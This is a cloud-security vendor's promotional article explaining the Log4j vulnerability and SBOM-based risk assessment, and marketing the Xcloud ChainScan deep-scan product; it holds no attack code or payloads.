Never Underestimate Your Enemy – A Guide to Log4j

What is Log4j, and how did it originate? 

Log4j can breach your unpatched systems and increase the blast radius of its impact.  

Log4j, an open-source Java-based login framework, collects and aggregates data about a system’s activity. In July 2013, the Apache Software Foundation (ASF) received a feature request for a new data storage and retrieval mechanism called the Java Naming and Directory Interface^TM (JNDI). The open-source developer community did not conduct a rigorous security review due to a lack of resources and knowledge and integrated this feature into every application.  

Is Log4j Still Relevant? 

Yes, absolutely. 

Based on Cybersecurity and Infrastructure Security Agency (CISA), with Log4jShell vulnerability, hackers continue to exploit VMWare Horizon Systems. It is difficult to understand the exploitation trends since many organizations lack awareness of the impact and do not know what information to collect, and reporting is voluntary. Developers have accidentally embedded Log4j vulnerability in many software services that are difficult to map using standard scanning techniques.  

Log4j vulnerability needs solutions that can run a deep scan of third-party libraries. State and national governments globally use Log4j for critical infrastructure applications. Log4j and ASF teams have no visibility of who are Log4j framework users and how the Log4j framework becomes a part of application development. Attackers have easy access to the Log4j vulnerability at a lower level, giving them complete control of the compromised system. 

How secure are organizations currently against Log4j? 

Enterprises that had a full security review proactively patched any vulnerable systems. These enterprise security teams had dedicated resources that understood their use of Log4j through a Software Bill of Material (SBOM) before integrating Log4j in their application development or procurement. SBOM helped the enterprises assess the risk faster and mobilize the resources to patch the system while minimizing any gaps in their security posture.  

Most organizations to date do not have a robust security strategy focusing on understanding their current software inventory and assessing the extent of exposure through a Log4j vulnerability. They are often not clear on the trade-off between patching their current system once they know the size of exposure and impact on their existing operations.  

What Can We Do for Your Company About Log4j? 

Xcloud platform’s ChainScan^TM capability runs a deep scan of third-party libraries to assess and highlight hidden vulnerabilities such as Log4j. It maps the dependencies throughout the application software supply chain and suggests remediation through software patches or policy enforcement.  

Xcloud – an end-to-end cloud security solution onboards customers that have adopted or plan to adopt a multi-cloud strategy. It enables customers to gain complete visibility in virtual machines and containers. The platform provides both CWPP and CSPM capabilities required to meet the infrastructure and application level’s internal security and external regulatory requirements.    

Security teams can deploy Xcloud using an agentless technology that allows us to use the public cloud provider API to scan the applications and infrastructure without impacting the operations. Once Xcloud examines the cloud-hosted applications and infrastructure, it provides a detailed inventory of the software libraries used. It prioritizes the known vulnerabilities, misconfigurations, and malware in your cloud environment.  

Our deep scan capability ensures Xcloud finds and recommends remediation measures to the security teams for any hidden vulnerabilities. Additionally, the ease of onboarding assists developers in gaining an understanding of the cloud security posture, reducing the dependency on security teams during application development and deployment.